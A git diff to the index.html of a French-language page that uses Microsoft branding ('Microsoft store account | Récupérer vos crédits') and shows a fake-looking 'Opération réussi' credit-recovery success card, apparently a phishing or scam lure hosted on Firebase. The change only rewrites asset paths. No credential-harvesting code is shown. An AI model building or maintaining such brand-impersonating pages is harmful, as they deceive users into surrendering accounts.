Update firebase json and path files

--- a/index.html
+++ b/index.html
@@ -2,8 +2,8 @@
 <html lang="en">
 	<head>
 		<meta charset="utf-8" />
-		<link rel="icon" href="./static/favicon.ico" />
-        <link rel="stylesheet" href="./boostrap.css">
+		<link rel="icon" href="/static/favicon.ico" />
+        <link rel="stylesheet" href="boostrap.css">
 		<meta name="viewport" content="width=device-width, initial-scale=1" />
 		<title>
 			Microsoft store account | Récupérer vos crédits – Microsoft
@@ -57,11 +57,11 @@
             <span id="spinner" class="loader mt-5"></span>
             <div id="card-xbox" class="card text-center mt-3" style="display: none;">
                 <div class="card-header">
-                    <img src="./static/microsoft_logo.png" alt="Microsoft" width="180px" height="60px" />
+                    <img src="/static/microsoft_logo.png" alt="Microsoft" width="180px" height="60px" />
                 </div>
                 <div class="card-body">
                     <h5 class="card-title d-flex flex-column justify-content-center align-items-center">
-                        <img src="./static/validate.png" class="ml-3" alt="Microsoft" width="60px" height="60px" />
+                        <img src="/static/validate.png" class="ml-3" alt="Microsoft" width="60px" height="60px" />
                         <div>Opération réussi</div>
                     </h5>
                     <p class="card-text mt-3">Vous pouvez désormais récupérer vos crédits sur votre compte.</p>
